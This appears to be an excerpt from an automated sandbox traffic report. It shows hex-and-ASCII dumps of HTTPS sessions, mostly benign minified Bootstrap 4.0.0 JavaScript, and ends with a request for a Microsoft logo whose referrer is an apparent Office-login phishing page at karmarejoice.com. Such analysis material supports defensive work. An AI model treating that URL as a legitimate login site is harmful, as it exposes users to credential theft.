                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC849INData Raw: 69 76 22 29 2c 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 2e 63 6c 61 73 73 4e 61 6d 65 3d 75 2c 69 26 26 74 28 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 29 2e 61 70 70 65 6e 64 54 6f 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2c 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 68 2e 43 4c 49 43 4b 5f 44 49 53 4d 49 53 53 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 2e 5f 69 67 6e 6f 72 65 42 61 63 6b 64 72 6f 70 43 6c 69 63 6b 3f 6e 2e 5f 69 67 6e 6f 72 65 42 61 63 6b 64 72 6f 70 43 6c 69 63 6b 3d 21 31 3a 74 2e 74 61 72 67 65 74 3d 3d 3d 74 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 26 26 28 22 73 74 61 74 69 63 22 3d 3d 3d 6e 2e 5f 63 6f 6e 66 69 67 2e 62
                                                                                                                                                                                                                            Data Ascii: iv"),this._backdrop.className=u,i&&t(this._backdrop).addClass(i),t(this._backdrop).appendTo(document.body),t(this._element).on(h.CLICK_DISMISS,function(t){n._ignoreBackdropClick?n._ignoreBackdropClick=!1:t.target===t.currentTarget&&("static"===n._config.b
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC851INData Raw: 6e 2c 69 29 7b 76 61 72 20 73 3d 74 28 69 29 5b 30 5d 2e 73 74 79 6c 65 2e 70 61 64 64 69 6e 67 52 69 67 68 74 2c 72 3d 74 28 69 29 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 22 29 3b 74 28 69 29 2e 64 61 74 61 28 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 22 2c 73 29 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 22 2c 70 61 72 73 65 46 6c 6f 61 74 28 72 29 2b 65 2e 5f 73 63 72 6f 6c 6c 62 61 72 57 69 64 74 68 2b 22 70 78 22 29 7d 29 2c 74 28 67 2e 53 54 49 43 4b 59 5f 43 4f 4e 54 45 4e 54 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 69 29 7b 76 61 72 20 73 3d 74 28 69 29 5b 30 5d 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 52 69 67 68 74 2c 72 3d 74 28 69 29 2e 63 73 73 28 22 6d 61 72 67 69 6e 2d 72 69 67 68 74 22 29 3b 74 28
                                                                                                                                                                                                                            Data Ascii: n,i){var s=t(i)[0].style.paddingRight,r=t(i).css("padding-right");t(i).data("padding-right",s).css("padding-right",parseFloat(r)+e._scrollbarWidth+"px")}),t(g.STICKY_CONTENT).each(function(n,i){var s=t(i)[0].style.marginRight,r=t(i).css("margin-right");t(
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC852INData Raw: 65 7d 2c 6f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 3d 74 28 74 68 69 73 29 2e 64 61 74 61 28 6e 29 2c 61 3d 72 28 7b 7d 2c 6f 2e 44 65 66 61 75 6c 74 2c 74 28 74 68 69 73 29 2e 64 61 74 61 28 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 29 3b 69 66 28 73 7c 7c 28 73 3d 6e 65 77 20 6f 28 74 68 69 73 2c 61 29 2c 74 28 74 68 69 73 29 2e 64 61 74 61 28 6e 2c 73 29 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 73 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20
                                                                                                                                                                                                                            Data Ascii: e},o._jQueryInterface=function(e,i){return this.each(function(){var s=t(this).data(n),a=r({},o.Default,t(this).data(),"object"==typeof e&&e);if(s||(s=new o(this,a),t(this).data(n,s)),"string"==typeof e){if("undefined"==typeof s[e])throw new TypeError('No
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC853INData Raw: 6d 65 6e 74 29 22 7d 2c 63 3d 7b 41 55 54 4f 3a 22 61 75 74 6f 22 2c 54 4f 50 3a 22 74 6f 70 22 2c 52 49 47 48 54 3a 22 72 69 67 68 74 22 2c 42 4f 54 54 4f 4d 3a 22 62 6f 74 74 6f 6d 22 2c 4c 45 46 54 3a 22 6c 65 66 74 22 7d 2c 75 3d 7b 61 6e 69 6d 61 74 69 6f 6e 3a 21 30 2c 74 65 6d 70 6c 61 74 65 3a 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 6f 6c 74 69 70 22 20 72 6f 6c 65 3d 22 74 6f 6f 6c 74 69 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 6f 6c 74 69 70 2d 69 6e 6e 65 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 27 2c 74 72 69 67 67 65 72 3a 22 68 6f 76 65 72 20 66 6f 63 75 73 22 2c 74 69 74 6c 65 3a 22 22 2c 64 65 6c 61 79 3a 30 2c 68 74 6d 6c 3a 21 31 2c 73 65 6c 65
                                                                                                                                                                                                                            Data Ascii: ment)"},c={AUTO:"auto",TOP:"top",RIGHT:"right",BOTTOM:"bottom",LEFT:"left"},u={animation:!0,template:'<div class="tooltip" role="tooltip"><div class="arrow"></div><div class="tooltip-inner"></div></div>',trigger:"hover focus",title:"",delay:0,html:!1,sele
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC854INData Raw: 34 33 37 63 0d 0a 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 2c 74 68 69 73 2e 5f 67 65 74 44 65 6c 65 67 61 74 65 43 6f 6e 66 69 67 28 29 29 2c 74 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2e 64 61 74 61 28 6e 2c 69 29 29 2c 69 2e 5f 61 63 74 69 76 65 54 72 69 67 67 65 72 2e 63 6c 69 63 6b 3d 21 69 2e 5f 61 63 74 69 76 65 54 72 69 67 67 65 72 2e 63 6c 69 63 6b 2c 69 2e 5f 69 73 57 69 74 68 41 63 74 69 76 65 54 72 69 67 67 65 72 28 29 3f 69 2e 5f 65 6e 74 65 72 28 6e 75 6c 6c 2c 69 29 3a 69 2e 5f 6c 65 61 76 65 28 6e 75 6c 6c 2c 69 29 7d 65 6c 73 65 7b 69 66 28 74 28 74 68 69 73 2e 67 65 74 54 69 70 45 6c 65 6d 65 6e 74 28 29 29 2e 68 61 73 43 6c 61 73 73 28 70 29 29 72 65 74 75 72 6e 20 76 6f
                                                                                                                                                                                                                            Data Ascii: 437cthis.constructor(e.currentTarget,this._getDelegateConfig()),t(e.currentTarget).data(n,i)),i._activeTrigger.click=!i._activeTrigger.click,i._isWithActiveTrigger()?i._enter(null,i):i._leave(null,i)}else{if(t(this.getTipElement()).hasClass(p))return vo
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC856INData Raw: 65 6d 65 6e 74 29 3a 74 68 69 73 2e 63 6f 6e 66 69 67 2e 70 6c 61 63 65 6d 65 6e 74 2c 68 3d 74 68 69 73 2e 5f 67 65 74 41 74 74 61 63 68 6d 65 6e 74 28 6c 29 3b 74 68 69 73 2e 61 64 64 41 74 74 61 63 68 6d 65 6e 74 43 6c 61 73 73 28 68 29 3b 76 61 72 20 63 3d 21 31 3d 3d 3d 74 68 69 73 2e 63 6f 6e 66 69 67 2e 63 6f 6e 74 61 69 6e 65 72 3f 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3a 74 28 74 68 69 73 2e 63 6f 6e 66 69 67 2e 63 6f 6e 74 61 69 6e 65 72 29 3b 74 28 72 29 2e 64 61 74 61 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 44 41 54 41 5f 4b 45 59 2c 74 68 69 73 29 2c 74 2e 63 6f 6e 74 61 69 6e 73 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 74 68 69 73 2e 74
                                                                                                                                                                                                                            Data Ascii: ement):this.config.placement,h=this._getAttachment(l);this.addAttachmentClass(h);var c=!1===this.config.container?document.body:t(this.config.container);t(r).data(this.constructor.DATA_KEY,this),t.contains(this.element.ownerDocument.documentElement,this.t
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC857INData Raw: 6e 73 74 72 75 63 74 6f 72 2e 45 76 65 6e 74 2e 48 49 44 44 45 4e 29 2c 6e 75 6c 6c 21 3d 3d 6e 2e 5f 70 6f 70 70 65 72 26 26 6e 2e 5f 70 6f 70 70 65 72 2e 64 65 73 74 72 6f 79 28 29 2c 65 26 26 65 28 29 7d 3b 74 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2e 74 72 69 67 67 65 72 28 73 29 2c 73 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 7c 7c 28 74 28 69 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 70 29 2c 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 74 28 22 62 6f 64 79 22 29 2e 63 68 69 6c 64 72 65 6e 28 29 2e 6f 66 66 28 22 6d 6f 75 73 65 6f 76 65 72 22 2c 6e 75 6c 6c 2c 74 2e 6e 6f 6f 70 29 2c 74 68 69 73 2e 5f 61 63 74 69 76 65 54 72 69 67 67 65 72 5b
                                                                                                                                                                                                                            Data Ascii: nstructor.Event.HIDDEN),null!==n._popper&&n._popper.destroy(),e&&e()};t(this.element).trigger(s),s.isDefaultPrevented()||(t(i).removeClass(p),"ontouchstart"in document.documentElement&&t("body").children().off("mouseover",null,t.noop),this._activeTrigger[
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC858INData Raw: 74 28 22 20 22 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 22 63 6c 69 63 6b 22 3d 3d 3d 6e 29 74 28 65 2e 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 45 76 65 6e 74 2e 43 4c 49 43 4b 2c 65 2e 63 6f 6e 66 69 67 2e 73 65 6c 65 63 74 6f 72 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 74 6f 67 67 6c 65 28 74 29 7d 29 3b 65 6c 73 65 20 69 66 28 6e 21 3d 3d 43 29 7b 76 61 72 20 69 3d 6e 3d 3d 3d 45 3f 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 45 76 65 6e 74 2e 4d 4f 55 53 45 45 4e 54 45 52 3a 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 45 76 65 6e 74 2e 46 4f 43 55 53 49 4e 2c 73 3d 6e 3d 3d 3d 45 3f 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 45 76 65 6e 74 2e 4d 4f 55 53 45 4c
                                                                                                                                                                                                                            Data Ascii: t(" ").forEach(function(n){if("click"===n)t(e.element).on(e.constructor.Event.CLICK,e.config.selector,function(t){return e.toggle(t)});else if(n!==C){var i=n===E?e.constructor.Event.MOUSEENTER:e.constructor.Event.FOCUSIN,s=n===E?e.constructor.Event.MOUSEL
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC860INData Raw: 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 44 41 54 41 5f 4b 45 59 3b 28 6e 3d 6e 7c 7c 74 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2e 64 61 74 61 28 69 29 29 7c 7c 28 6e 3d 6e 65 77 20 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 2c 74 68 69 73 2e 5f 67 65 74 44 65 6c 65 67 61 74 65 43 6f 6e 66 69 67 28 29 29 2c 74 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2e 64 61 74 61 28 69 2c 6e 29 29 2c 65 26 26 28 6e 2e 5f 61 63 74 69 76 65 54 72 69 67 67 65 72 5b 22 66 6f 63 75 73 6f 75 74 22 3d 3d 3d 65 2e 74 79 70 65 3f 54 3a 45 5d 3d 21 31 29 2c 6e 2e 5f 69 73 57 69 74 68 41 63 74 69 76 65 54 72 69 67 67 65 72 28 29 7c 7c 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6e 2e 5f 74 69 6d 65 6f 75 74
                                                                                                                                                                                                                            Data Ascii: s.constructor.DATA_KEY;(n=n||t(e.currentTarget).data(i))||(n=new this.constructor(e.currentTarget,this._getDelegateConfig()),t(e.currentTarget).data(i,n)),e&&(n._activeTrigger["focusout"===e.type?T:E]=!1),n._isWithActiveTrigger()||(clearTimeout(n._timeout
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC861INData Raw: 29 26 26 28 74 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 67 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 2e 61 6e 69 6d 61 74 69 6f 6e 3d 21 31 2c 74 68 69 73 2e 68 69 64 65 28 29 2c 74 68 69 73 2e 73 68 6f 77 28 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 2e 61 6e 69 6d 61 74 69 6f 6e 3d 6e 29 7d 2c 61 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 74 28 74 68 69 73 29 2e 64 61 74 61 28 69 29 2c 73 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 3b 69 66 28 28 6e 7c 7c 21 2f 64 69 73 70 6f 73 65 7c 68 69 64 65 2f 2e 74 65 73 74 28 65 29 29 26 26 28 6e 7c 7c 28 6e 3d 6e 65 77 20 61 28 74 68 69 73 2c
                                                                                                                                                                                                                            Data Ascii: )&&(t(e).removeClass(g),this.config.animation=!1,this.hide(),this.show(),this.config.animation=n)},a._jQueryInterface=function(e){return this.each(function(){var n=t(this).data(i),s="object"==typeof e&&e;if((n||!/dispose|hide/.test(e))&&(n||(n=new a(this,
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC862INData Raw: 73 69 6e 22 2b 69 2c 46 4f 43 55 53 4f 55 54 3a 22 66 6f 63 75 73 6f 75 74 22 2b 69 2c 4d 4f 55 53 45 45 4e 54 45 52 3a 22 6d 6f 75 73 65 65 6e 74 65 72 22 2b 69 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 6f 2c 67 3b 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 72 65 74 75 72 6e 20 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7c 7c 74 68 69 73 7d 67 3d 72 2c 28 6f 3d 70 29 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6f 2c 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 67 3b 76 61 72 20 6d 3d 70 2e 70 72 6f 74 6f 74
                                                                                                                                                                                                                            Data Ascii: sin"+i,FOCUSOUT:"focusout"+i,MOUSEENTER:"mouseenter"+i,MOUSELEAVE:"mouseleave"+i},g=function(r){var o,g;function p(){return r.apply(this,arguments)||this}g=r,(o=p).prototype=Object.create(g.prototype),o.prototype.constructor=o,o.__proto__=g;var m=p.protot
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC864INData Raw: 4e 41 4d 45 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 7d 2c 7b 6b 65 79 3a 22 44 41 54 41 5f 4b 45 59 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 7d 2c 7b 6b 65 79 3a 22 45 76 65 6e 74 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 7d 7d 2c 7b 6b 65 79 3a 22 45 56 45 4e 54 5f 4b 45 59 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 54 79 70 65 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 7d 7d 5d 29 2c 70 7d 28 55 29 3b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 67 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73
                                                                                                                                                                                                                            Data Ascii: NAME",get:function(){return e}},{key:"DATA_KEY",get:function(){return n}},{key:"Event",get:function(){return _}},{key:"EVENT_KEY",get:function(){return i}},{key:"DefaultType",get:function(){return h}}]),p}(U);return t.fn[e]=g._jQueryInterface,t.fn[e].Cons
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC865INData Raw: 72 65 73 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 3d 3d 3d 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 2e 77 69 6e 64 6f 77 3f 64 3a 5f 2c 69 3d 22 61 75 74 6f 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6d 65 74 68 6f 64 3f 6e 3a 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6d 65 74 68 6f 64 2c 73 3d 69 3d 3d 3d 5f 3f 74 68 69 73 2e 5f 67 65 74 53 63 72 6f 6c 6c 54 6f 70 28 29 3a 30 3b 74 68 69 73 2e 5f 6f 66 66 73 65 74 73 3d 5b 5d 2c 74 68 69 73 2e 5f 74 61 72 67 65 74 73 3d 5b 5d 2c 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 48 65 69 67 68 74 3d 74 68 69 73 2e 5f 67 65 74 53 63 72 6f 6c 6c 48 65 69 67 68 74 28 29 2c 74 2e 6d 61 6b 65 41 72 72 61 79 28
                                                                                                                                                                                                                            Data Ascii: resh=function(){var e=this,n=this._scrollElement===this._scrollElement.window?d:_,i="auto"===this._config.method?n:this._config.method,s=i===_?this._getScrollTop():0;this._offsets=[],this._targets=[],this._scrollHeight=this._getScrollHeight(),t.makeArray(
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC866INData Raw: 68 74 3a 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2e 68 65 69 67 68 74 7d 2c 67 2e 5f 70 72 6f 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 67 65 74 53 63 72 6f 6c 6c 54 6f 70 28 29 2b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6f 66 66 73 65 74 2c 65 3d 74 68 69 73 2e 5f 67 65 74 53 63 72 6f 6c 6c 48 65 69 67 68 74 28 29 2c 6e 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6f 66 66 73 65 74 2b 65 2d 74 68 69 73 2e 5f 67 65 74 4f 66 66 73 65 74 48 65 69 67 68 74 28 29 3b 69 66 28 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 48 65 69 67 68 74 21 3d 3d 65 26 26 74 68 69 73 2e 72 65 66 72 65 73 68 28 29 2c 74 3e 3d 6e 29 7b 76 61 72 20 69 3d 74 68 69
                                                                                                                                                                                                                            Data Ascii: ht:this._scrollElement.getBoundingClientRect().height},g._process=function(){var t=this._getScrollTop()+this._config.offset,e=this._getScrollHeight(),n=this._config.offset+e-this._getOffsetHeight();if(this._scrollHeight!==e&&this.refresh(),t>=n){var i=thi
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC868INData Raw: 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 69 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 65 2b 27 22 27 29 3b 69 5b 65 5d 28 29 7d 7d 29 7d 2c 73 28 6f 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 30 2e 30 22 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 5d 29 2c 6f 7d 28 29 3b 72 65 74 75 72 6e 20 74 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 68 2e 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                            Data Ascii: "string"==typeof e){if("undefined"==typeof i[e])throw new TypeError('No method named "'+e+'"');i[e]()}})},s(o,null,[{key:"VERSION",get:function(){return"4.0.0"}},{key:"Default",get:function(){return a}}]),o}();return t(window).on(h.LOAD_DATA_API,function(
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC869INData Raw: 67 65 74 3a 69 7d 29 3b 69 66 28 69 26 26 74 28 69 29 2e 74 72 69 67 67 65 72 28 63 29 2c 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 74 72 69 67 67 65 72 28 75 29 2c 21 75 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 26 26 21 63 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 29 7b 6f 26 26 28 6e 3d 74 28 6f 29 5b 30 5d 29 2c 74 68 69 73 2e 5f 61 63 74 69 76 61 74 65 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 73 29 3b 76 61 72 20 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 74 2e 45 76 65 6e 74 28 72 2e 48 49 44 44 45 4e 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 65 2e 5f 65 6c 65 6d 65 6e 74 7d 29 2c 73 3d 74 2e 45 76 65 6e 74 28 72 2e 53 48 4f 57 4e 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74
                                                                                                                                                                                                                            Data Ascii: get:i});if(i&&t(i).trigger(c),t(this._element).trigger(u),!u.isDefaultPrevented()&&!c.isDefaultPrevented()){o&&(n=t(o)[0]),this._activate(this._element,s);var g=function(){var n=t.Event(r.HIDDEN,{relatedTarget:e._element}),s=t.Event(r.SHOWN,{relatedTarget
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC870INData Raw: 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 30 2e 30 22 7d 7d 5d 29 2c 6e 7d 28 29 3b 72 65 74 75 72 6e 20 74 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 72 2e 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 2c 67 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 76 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 74 28 74 68 69 73 29 2c 22 73 68 6f 77 22 29 7d 29 2c 74 2e 66 6e 2e 74 61 62 3d 76 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 2e 74 61 62 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 76 2c 74 2e 66 6e 2e 74 61 62 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 2e 74 61 62 3d
                                                                                                                                                                                                                            Data Ascii: ION",get:function(){return"4.0.0"}}]),n}();return t(document).on(r.CLICK_DATA_API,g,function(e){e.preventDefault(),v._jQueryInterface.call(t(this),"show")}),t.fn.tab=v._jQueryInterface,t.fn.tab.Constructor=v,t.fn.tab.noConflict=function(){return t.fn.tab=
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC871INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            25192.168.2.649895192.229.221.185443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC871OUTGET /16.000.28543.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                                                                                                                                                                                                            Host: logincdn.msauth.net
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                            Referer: https://karmarejoice.com/lopi/office-RD117/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC914INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                            Age: 30203659
                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                            Content-MD5: nzaLxFgP7ZB3dfMcaybWzw==
                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:54 GMT
                                                                                                                                                                                                                            Etag: 0x8D7D6AF114B65DE
                                                                                                                                                                                                                            Last-Modified: Thu, 02 Apr 2020 02:39:29 GMT
                                                                                                                                                                                                                            Server: ECAcc (frc/8F6B)
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                            x-ms-request-id: 8b3f02e4-001e-004e-5546-54e3c9000000
                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                            Content-Length: 3651
                                                                                                                                                                                                                            Connection: close
